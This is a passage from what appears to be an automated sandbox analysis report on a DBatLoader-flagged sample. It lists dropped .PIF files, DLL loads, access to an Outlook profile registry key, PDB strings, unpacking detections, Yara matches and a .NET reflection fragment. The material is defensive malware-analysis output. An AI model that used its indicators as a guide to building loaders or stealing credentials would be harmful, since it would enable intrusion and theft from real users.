Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: ???.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: ???.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: ???.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: ??l.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: ??l.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: ?.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: ?.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: ??l.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: ????.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: ???e???????????.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: ???e???????????.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: ?.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: ?.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: ?.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: ?.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: ??l.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: ??l.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: tquery.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: cryptdll.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: spp.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: vssapi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: vsstrace.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: spp.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: vssapi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: vsstrace.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: mssip32.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: endpointdlp.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: endpointdlp.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: endpointdlp.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: endpointdlp.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: advapi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: advapi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: advapi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: advapi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: advapi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: advapi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: advapi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: spp.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: vssapi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: vsstrace.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: sppwmi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: sppcext.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: winscard.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: devobj.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmdext.dll
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Section loaded: version.dll	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Section loaded: msv1_0.dll	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Section loaded: ntlmshared.dll	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Section loaded: cryptdll.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: version.dll
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: uxtheme.dll
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: url.dll
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: ieframe.dll
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: iertutil.dll
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: netapi32.dll
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: userenv.dll
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: winhttp.dll
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: wkscli.dll
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: netutils.dll
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: amsi.dll
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: smartscreenps.dll
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: kernel.appcore.dll
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: winmm.dll
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: wininet.dll
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: sspicli.dll
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: windows.storage.dll
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: wldp.dll
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: profapi.dll
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: mswsock.dll
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: ieproxy.dll
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: ieproxy.dll
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: ieproxy.dll
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: msasn1.dll
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: msasn1.dll
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: msasn1.dll
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: mssip32.dll
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: msasn1.dll
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: iphlpapi.dll
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: winnsi.dll
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: mssip32.dll
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: msasn1.dll
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: mssip32.dll
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: msasn1.dll
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: ??????????.dll
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: ??.dll
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: sppc.dll
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: ???.dll
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: ???.dll
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: ???.dll
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: ??l.dll
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: ??l.dll
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: ?.dll
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: ?.dll
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: ??l.dll
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: ????.dll
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: ???e???????????.dll
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: ???e???????????.dll
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: ?.dll
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: ?.dll
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: ?.dll
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: ?.dll
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: ??l.dll
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: ??l.dll
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: sppc.dll
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: sppc.dll
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: sppc.dll
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: sppc.dll
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: tquery.dll
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: cryptdll.dll
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: spp.dll
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: vssapi.dll
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: vsstrace.dll
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: spp.dll
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: vssapi.dll
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: vsstrace.dll
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: mssip32.dll
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: msasn1.dll
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: endpointdlp.dll

Source: C:\Users\user\Desktop\yxU3AgeVTi.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\Public\Libraries\jphwmyiA.pif

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Source: yxU3AgeVTi.exe

Static file information: File size 1161216 > 1048576

Source:	Binary string: E:\Adlice\Truesight\x64\Release\truesight.pdb source: yxU3AgeVTi.exe, 00000000.00000003.1681344147.000000007F3E0000.00000004.00001000.00020000.00000000.sdmp, yxU3AgeVTi.exe, 00000000.00000002.1707069184.00000000213AA000.00000004.00000020.00020000.00000000.sdmp, yxU3AgeVTi.exe, 00000000.00000002.1709048620.000000007F0CF000.00000004.00001000.00020000.00000000.sdmp, yxU3AgeVTi.exe, 00000000.00000002.1702289482.0000000020610000.00000004.00001000.00020000.00000000.sdmp, yxU3AgeVTi.exe, 00000000.00000003.1681660647.00000000007FE000.00000004.00000020.00020000.00000000.sdmp, Aiymwhpj.PIF, 00000004.00000002.1837262720.00000000205C0000.00000004.00001000.00020000.00000000.sdmp, Aiymwhpj.PIF, 00000004.00000002.1842885940.0000000021170000.00000004.00000020.00020000.00000000.sdmp, Aiymwhpj.PIF, 00000004.00000002.1837262720.0000000020694000.00000004.00001000.00020000.00000000.sdmp, Aiymwhpj.PIF, 00000009.00000003.1879153226.000000000061A000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: easinvoker.pdb source: yxU3AgeVTi.exe, 00000000.00000003.1680843754.000000007F410000.00000004.00001000.00020000.00000000.sdmp, yxU3AgeVTi.exe, 00000000.00000002.1707383794.00000000214AA000.00000004.00001000.00020000.00000000.sdmp, yxU3AgeVTi.exe, 00000000.00000002.1702289482.0000000020610000.00000004.00001000.00020000.00000000.sdmp, Aiymwhpj.PIF, 00000004.00000002.1837262720.00000000205C0000.00000004.00001000.00020000.00000000.sdmp, Aiymwhpj.PIF, 00000004.00000002.1837262720.000000002067A000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: _.pdb source: jphwmyiA.pif, 00000003.00000002.4135237227.0000000025079000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 00000003.00000003.1688714133.000000002352C000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 00000003.00000002.4135902122.0000000025350000.00000004.08000000.00040000.00000000.sdmp, jphwmyiA.pif, 00000007.00000003.1808890300.0000000027E8C000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 00000007.00000002.4136820470.0000000029C89000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 00000007.00000002.4137756454.0000000029F60000.00000004.08000000.00040000.00000000.sdmp, jphwmyiA.pif, 00000007.00000003.1839978550.0000000027EE4000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 0000000C.00000002.4133906479.000000001B2C9000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 0000000C.00000003.1884488710.00000000195E1000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 0000000C.00000002.4138952220.000000001D9F0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: easinvoker.pdbGCTL source: yxU3AgeVTi.exe, 00000000.00000003.1680843754.000000007F410000.00000004.00001000.00020000.00000000.sdmp, yxU3AgeVTi.exe, 00000000.00000002.1707383794.00000000214AA000.00000004.00001000.00020000.00000000.sdmp, yxU3AgeVTi.exe, 00000000.00000003.1681562760.00000000007FE000.00000004.00000020.00020000.00000000.sdmp, yxU3AgeVTi.exe, 00000000.00000002.1707069184.0000000021382000.00000004.00000020.00020000.00000000.sdmp, yxU3AgeVTi.exe, 00000000.00000002.1702289482.0000000020610000.00000004.00001000.00020000.00000000.sdmp, Aiymwhpj.PIF, 00000004.00000002.1837262720.00000000205C0000.00000004.00001000.00020000.00000000.sdmp, Aiymwhpj.PIF, 00000004.00000003.1802890803.0000000000824000.00000004.00000020.00020000.00000000.sdmp, Aiymwhpj.PIF, 00000004.00000003.1802890803.0000000000853000.00000004.00000020.00020000.00000000.sdmp, Aiymwhpj.PIF, 00000004.00000002.1837262720.000000002067A000.00000004.00001000.00020000.00000000.sdmp, Aiymwhpj.PIF, 00000009.00000003.1878770387.000000000061A000.00000004.00000020.00020000.00000000.sdmp, Aiymwhpj.PIF, 00000009.00000003.1878770387.000000000064B000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\Public\Libraries\jphwmyiA.pif	Unpacked PE file: 3.2.jphwmyiA.pif.400000.0.unpack .text:ER;.data:W;.tls:W;.rdata:R;.idata:R;.edata:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Unpacked PE file: 7.2.jphwmyiA.pif.400000.1.unpack .text:ER;.data:W;.tls:W;.rdata:R;.idata:R;.edata:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Unpacked PE file: 12.2.jphwmyiA.pif.400000.1.unpack .text:ER;.data:W;.tls:W;.rdata:R;.idata:R;.edata:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;

Detected unpacking (overwrites its own PE header)

Source: C:\Users\Public\Libraries\jphwmyiA.pif	Unpacked PE file: 3.2.jphwmyiA.pif.400000.0.unpack
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Unpacked PE file: 7.2.jphwmyiA.pif.400000.1.unpack
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Unpacked PE file: 12.2.jphwmyiA.pif.400000.1.unpack

Yara detected DBatLoader

Source: Yara match	File source: 0.2.yxU3AgeVTi.exe.2930000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.yxU3AgeVTi.exe.22865a8.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.yxU3AgeVTi.exe.22865a8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000007.00000001.1805725850.0000000000B90000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.4109204899.0000000000C20000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.4109202248.0000000000B90000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.4109307157.0000000000B90000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1709607679.000000007FBB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000001.1687216190.0000000000C20000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000001.1881316189.0000000000B90000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1688698049.0000000002286000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

.NET source code contains method to dynamically call methods (often used by packers)

Source: 3.2.jphwmyiA.pif.250ba8c6.2.raw.unpack, WP6RZJql8gZrNhVA9v.cs	.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
Source: 3.2.jphwmyiA.pif.25350ee8.5.raw.unpack, WP6RZJql8gZrNhVA9v.cs	.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
Source: 3.2.jphwmyiA.pif.27870000.6.raw.unpack, WP6RZJql8gZrNhVA9v.cs	.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
